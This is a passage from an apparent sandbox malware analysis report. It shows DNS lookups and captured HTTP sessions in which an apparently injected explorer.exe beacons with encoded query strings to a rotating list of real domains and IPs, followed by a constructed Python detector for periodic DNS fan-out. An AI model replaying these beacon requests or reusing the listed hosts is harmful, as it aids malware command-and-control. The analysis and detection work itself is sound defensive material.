                                           Sep 27, 2021 17:55:17.665668011 CEST | 8.8.8.8   | 192.168.2.4 | 0x186    | No error (0)       | www.apexpropertiesltd.com       | apexpropertiesltd.com       | -               | CNAME (Canonical name) | IN (0x0001)
                                           Sep 27, 2021 17:55:17.665668011 CEST | 8.8.8.8   | 192.168.2.4 | 0x186    | No error (0)       | apexpropertiesltd.com           | -                           | 34.102.136.180  | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:55:22.922290087 CEST | 8.8.8.8   | 192.168.2.4 | 0xca11   | No error (0)       | www.tameka-stewart.com          | tameka-stewart.com          | -               | CNAME (Canonical name) | IN (0x0001)
                                           Sep 27, 2021 17:55:22.922290087 CEST | 8.8.8.8   | 192.168.2.4 | 0xca11   | No error (0)       | tameka-stewart.com              | -                           | 184.168.131.241 | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:55:28.439892054 CEST | 8.8.8.8   | 192.168.2.4 | 0x3350   | No error (0)       | www.khlopok.club                | khlopok.club                | -               | CNAME (Canonical name) | IN (0x0001)
                                           Sep 27, 2021 17:55:28.439892054 CEST | 8.8.8.8   | 192.168.2.4 | 0x3350   | No error (0)       | khlopok.club                    | -                           | 34.252.217.69   | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:55:33.632623911 CEST | 8.8.8.8   | 192.168.2.4 | 0xad6b   | No error (0)       | www.tovardarom.xyz              | tovardarom.xyz              | -               | CNAME (Canonical name) | IN (0x0001)
                                           Sep 27, 2021 17:55:33.632623911 CEST | 8.8.8.8   | 192.168.2.4 | 0xad6b   | No error (0)       | tovardarom.xyz                  | -                           | 213.5.70.60     | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:55:38.846456051 CEST | 8.8.8.8   | 192.168.2.4 | 0xd08a   | Server failure (2) | www.zambiaedu.xyz               | none                        | none            | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:55:49.096210957 CEST | 8.8.8.8   | 192.168.2.4 | 0xcc59   | No error (0)       | www.lianshangtron.com           | -                           | 103.100.209.77  | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:55:54.556010962 CEST | 8.8.8.8   | 192.168.2.4 | 0x1fa1   | No error (0)       | www.nutritionhawks.com          | -                           | 74.208.236.139  | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:56:00.242336988 CEST | 8.8.8.8   | 192.168.2.4 | 0x6578   | No error (0)       | www.trasportesemmanuel.com      | -                           | 162.241.61.210  | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:56:06.681133986 CEST | 8.8.8.8   | 192.168.2.4 | 0xf40    | No error (0)       | www.novasaude-g1.online         | -                           | 172.67.153.117  | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:56:06.681133986 CEST | 8.8.8.8   | 192.168.2.4 | 0xf40    | No error (0)       | www.novasaude-g1.online         | -                           | 104.21.3.64     | A (IP address)         | IN (0x0001)
                                           Sep 27, 2021 17:56:16.937889099 CEST | 8.8.8.8   | 192.168.2.4 | 0xc5ac   | No error (0)       | www.studyengland.com            | -                           | 209.99.64.43    | A (IP address)         | IN (0x0001)
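
The two DNS tables above show one client (192.168.2.4) resolving thirteen unrelated domains one after another at roughly five-second intervals, and moving on after an NXDOMAIN (www.lakeefctmich.com) and a SERVFAIL (www.zambiaedu.xyz) just as it does after a successful answer. That cadence, rather than any single name, is the durable indicator once the domain list rotates. The Python below is an added example and not part of the Joe Sandbox report: it takes the query timestamps, names and reply codes from the tables (copied into a constructed one-line-per-query log, clock converted from CEST to UTC), adds a constructed benign client that must not fire, and flags clients whose queries to many distinct registered domains are spaced at a near-constant interval. The log format, the thresholds and the two-label "registered domain" shortcut are assumptions made for the example.

```python
"""Detect a periodic DNS fan-out from one client across many domains.

Added example; not part of the Joe Sandbox report. The log format
("<ISO timestamp> <client ip> <qname> <rcode>") is invented for the
example, and the thresholds are assumptions. The 192.168.2.4 lines copy
the timestamps, names and reply codes from the DNS tables in the report
(clock converted from CEST to UTC); the 192.168.2.7 lines are constructed
benign traffic that must not fire.
"""
import statistics
from collections import defaultdict
from datetime import datetime

DNS_LOG = """\
2021-09-27T15:55:07.083 192.168.2.4 www.lakeefctmich.com NXDOMAIN
2021-09-27T15:55:12.453 192.168.2.4 www.josiemaran-supernatural.com NOERROR
2021-09-27T15:55:17.625 192.168.2.4 www.apexpropertiesltd.com NOERROR
2021-09-27T15:55:22.896 192.168.2.4 www.tameka-stewart.com NOERROR
2021-09-27T15:55:28.364 192.168.2.4 www.khlopok.club NOERROR
2021-09-27T15:55:33.564 192.168.2.4 www.tovardarom.xyz NOERROR
2021-09-27T15:55:38.722 192.168.2.4 www.zambiaedu.xyz SERVFAIL
2021-09-27T15:55:43.865 192.168.2.4 www.bajajfinservmutualfund.com NOERROR
2021-09-27T15:55:48.908 192.168.2.4 www.lianshangtron.com NOERROR
2021-09-27T15:55:54.525 192.168.2.4 www.nutritionhawks.com NOERROR
2021-09-27T15:56:00.082 192.168.2.4 www.trasportesemmanuel.com NOERROR
2021-09-27T15:56:06.646 192.168.2.4 www.novasaude-g1.online NOERROR
2021-09-27T15:56:16.813 192.168.2.4 www.studyengland.com NOERROR
2021-09-27T15:55:10.000 192.168.2.7 www.example.com NOERROR
2021-09-27T15:55:10.200 192.168.2.7 cdn.example.net NOERROR
2021-09-27T15:55:40.900 192.168.2.7 www.example.com NOERROR
"""


def registered_domain(qname):
    """Last two labels of the name. A real deployment would consult a
    public suffix list; two labels are enough for the names in this example."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def parse_dns(text):
    """Group (timestamp, qname, rcode) tuples by client address."""
    by_client = defaultdict(list)
    for line in text.splitlines():
        ts, client, qname, rcode = line.split()
        by_client[client].append((datetime.fromisoformat(ts), qname, rcode))
    return by_client


def periodic_fanout(queries, min_domains=8, tolerance=0.3, min_regular=0.8):
    """Return a finding if the client queried at least min_domains distinct
    registered domains and at least min_regular of the inter-query gaps sit
    within +/-tolerance of the median gap; otherwise None. Failed lookups
    still count: the sample kept its cadence through an NXDOMAIN and a
    SERVFAIL."""
    queries = sorted(queries)
    domains = {registered_domain(q) for _, q, _ in queries}
    if len(domains) < min_domains or len(queries) < 3:
        return None
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(queries, queries[1:])]
    median_gap = statistics.median(gaps)
    regular = sum(abs(g - median_gap) <= tolerance * median_gap for g in gaps) / len(gaps)
    if regular < min_regular:
        return None
    return {
        "domains": len(domains),
        "period_s": round(median_gap, 2),
        "regular_fraction": round(regular, 2),
        "failed_lookups": sum(r != "NOERROR" for _, _, r in queries),
    }


def scan(text, **thresholds):
    """Map each client that trips the heuristic to its finding."""
    findings = {}
    for client, queries in parse_dns(text).items():
        hit = periodic_fanout(queries, **thresholds)
        if hit:
            findings[client] = hit
    return findings


if __name__ == "__main__":
    for client, hit in scan(DNS_LOG).items():
        print(client, hit)
```

On the report's data the only hit is 192.168.2.4 with 13 domains, a median gap just over 5 seconds and 2 failed lookups; the last gap (about 10 s before www.studyengland.com) is the one outlier the tolerance absorbs. Tune min_domains and tolerance against your own resolver logs before relying on it, since CDN-heavy browsing can also fan out quickly, though rarely with this regular a clock.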

                                          HTTP Request Dependency Graph

                                          • www.josiemaran-supernatural.com
                                          • www.apexpropertiesltd.com
                                          • www.tameka-stewart.com
                                          • www.khlopok.club
                                          • www.tovardarom.xyz
                                          • www.lianshangtron.com
                                          • www.nutritionhawks.com
                                          • www.trasportesemmanuel.com

                                          HTTP Packets

                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           0          | 192.168.2.4 | 49802       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:55:12.501652956 CEST | 5828               | OUT       | GET /b5ce/?7nqLWRV0=/AI3JQDCZyk/6ubsQmnvJO3EeIaIHb6AvonvM2F4xgXAwnTSleK6/XaIEVHpjjtFOEyF&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.josiemaran-supernatural.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:55:12.615387917 CEST | 5829               | IN        | HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 15:55:12 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6139ed55-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           1          | 192.168.2.4 | 49818       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:55:17.685591936 CEST | 5866               | OUT       | GET /b5ce/?7nqLWRV0=wzjkW/L/N1XOH+XSD0678S8O9bVA9y0oVtkfQbp3MHT7u8jt+16wQlgR8fjrLlP4MYPZ&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.apexpropertiesltd.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:55:17.866120100 CEST | 5866               | IN        | HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 15:55:17 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "614a6c08-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                           Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                                           2          | 192.168.2.4 | 49819       | 184.168.131.241 | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:55:23.105173111 CEST | 5867               | OUT       | GET /b5ce/?7nqLWRV0=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+Axc57SiIQXe&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.tameka-stewart.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:55:23.340370893 CEST | 5867               | IN        | HTTP/1.1 301 Moved Permanently
                                          Server: nginx/1.20.1
                                          Date: Mon, 27 Sep 2021 15:55:23 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Location: https://www.canva.com/design/DAEqGfr3AaI/vRqE8nRm-nYBi3y5_65bMw/view?website#2
                                          Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           3          | 192.168.2.4 | 49820       | 34.252.217.69  | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:55:28.479546070 CEST | 5868               | OUT       | GET /b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.khlopok.club
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:55:28.520457983 CEST | 5869               | IN        | HTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 15:55:28 GMT
                                          Server: Apache
                                          X-Frame-Options: SAMEORIGIN
                                          Location: http://khlopok.club/b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3
                                          Cache-Control: max-age=86400
                                          Expires: Tue, 28 Sep 2021 15:55:28 GMT
                                          Content-Length: 327
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 68 6c 6f 70 6f 6b 2e 63 6c 75 62 2f 62 35 63 65 2f 3f 37 6e 71 4c 57 52 56 30 3d 6b 4e 78 5a 49 57 54 51 78 35 6e 43 4e 6c 76 4a 6f 6e 49 59 62 4a 43 42 51 6d 76 56 63 54 32 58 31 43 69 51 79 59 5a 32 70 51 68 75 45 4f 7a 39 76 72 41 76 6d 51 67 32 64 68 47 49 57 62 75 4f 6e 78 4d 70 26 61 6d 70 3b 44 4a 45 38 58 3d 34 68 6c 68 33 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://khlopok.club/b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&amp;DJE8X=4hlh3">here</a>.</p></body></html>


                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           4          | 192.168.2.4 | 49821       | 213.5.70.60    | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:55:33.664252996 CEST | 5870               | OUT       | GET /b5ce/?7nqLWRV0=DJnvNV/6mp+JehKrIaw09sUOMJEcD/JystEz9B9fnmezvaywTqAFSPdXHnxiLUzhPCdJ&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.tovardarom.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:55:33.689775944 CEST | 5871               | IN        | HTTP/1.1 404 Not Found
                                          Server: nginx/1.18.0 (Ubuntu)
                                          Date: Mon, 27 Sep 2021 15:55:33 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 488
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "5f6c8b3c-1e8"
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 d0 97 d0 b0 d0 bf d1 80 d0 be d1 81 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 20 d0 b8 d0 bb d0 b8 20 d1 83 d0 b4 d0 b0 d0 bb d0 b5 d0 bd 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d0 b0 d1 8f 20 d1 81 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 d0 b8 d0 bb d0 b8 20 d1 83 d0 b4 d0 b0 d0 bb d0 b5 d0 bd d0 b0 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="ru"> <head> <title>404</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta content=" " name="description" /> </head> <body> <br/><br/><br/> <center> <h1> .</h1> </center> </body></html>


                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           5          | 192.168.2.4 | 49843       | 103.100.209.77 | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:55:49.292537928 CEST | 5933               | OUT       | GET /b5ce/?7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.lianshangtron.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:55:49.488394022 CEST | 5933               | IN        | HTTP/1.1 302 Found
                                          Date: Mon, 27 Sep 2021 15:55:49 GMT
                                          Server: Apache/2.4.43
                                          Location: https://www.lianshangtron.com/index.php?s=b5ce/&7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3
                                          Content-Length: 407
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 61 6e 73 68 61 6e 67 74 72 6f 6e 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 62 35 63 65 2f 26 61 6d 70 3b 37 6e 71 4c 57 52 56 30 3d 57 64 43 6e 2f 6b 50 4f 73 47 45 43 51 36 58 35 77 66 70 36 35 70 6f 4b 37 53 77 69 6e 42 77 6a 67 66 71 41 38 43 61 6e 51 47 78 51 48 76 36 4f 6b 66 30 34 73 33 71 46 42 7a 30 44 62 77 56 35 75 7a 67 79 26 61 6d 70 3b 44 4a 45 38 58 3d 34 68 6c 68 33 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 33 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 61 6e 73 68 61 6e 67 74 72 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.lianshangtron.com/index.php?s=b5ce/&amp;7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&amp;DJE8X=4hlh3">here</a>.</p><hr><address>Apache/2.4.43 Server at www.lianshangtron.com Port 80</address></body></html>


                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           6          | 192.168.2.4 | 49844       | 74.208.236.139 | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:55:54.691708088 CEST | 5934               | OUT       | GET /b5ce/?7nqLWRV0=iJSCg4qWtYnzw4GHWivdfaPpYoJ+2S3Wh/71x72UXIcZgXPac3WPQ9rqQY8gaQxsRQ0f&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.nutritionhawks.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:55:55.071660995 CEST | 5935               | IN        | HTTP/1.1 301 Moved Permanently
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Mon, 27 Sep 2021 15:55:54 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.4.23
                                          X-LiteSpeed-Tag: 1a0_HTTP.404
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          X-Redirect-By: WordPress
                                          Location: http://nutritionhawks.com/b5ce/?7nqLWRV0=iJSCg4qWtYnzw4GHWivdfaPpYoJ+2S3Wh/71x72UXIcZgXPac3WPQ9rqQY8gaQxsRQ0f&DJE8X=4hlh3
                                          Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                           7          | 192.168.2.4 | 49845       | 162.241.61.210 | 80               | C:\Windows\explorer.exe
                                           Timestamp                            | kBytes transferred | Direction | Data
                                           Sep 27, 2021 17:56:00.387617111 CEST | 5936               | OUT       | GET /b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.trasportesemmanuel.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Sep 27, 2021 17:56:00.801204920 CEST | 5937               | IN        | HTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 15:56:00 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Accept-Ranges: none
                                          Vary: Accept-Encoding
                                          Cache-Control: no-cache, no-store, must-revalidate
                                          Pragma: no-cache
                                          Expires: 0
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 33 65 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 53 54 4d 76 4d 55 31 4e 55 58 4e 75 63 7a 67 32 61 6d 5a 4f 56 58 46 32 64 57 31 55 4e 48 56 71 61 47 56 5a 4d 44 6c 32 52 33 68 33 57 48 68 57 52 58 46 49 54 6b 6b 33 52 47 56 6c 4d 54 52 56 65 57 51 32 63 58 64 51 61 30 31 47 
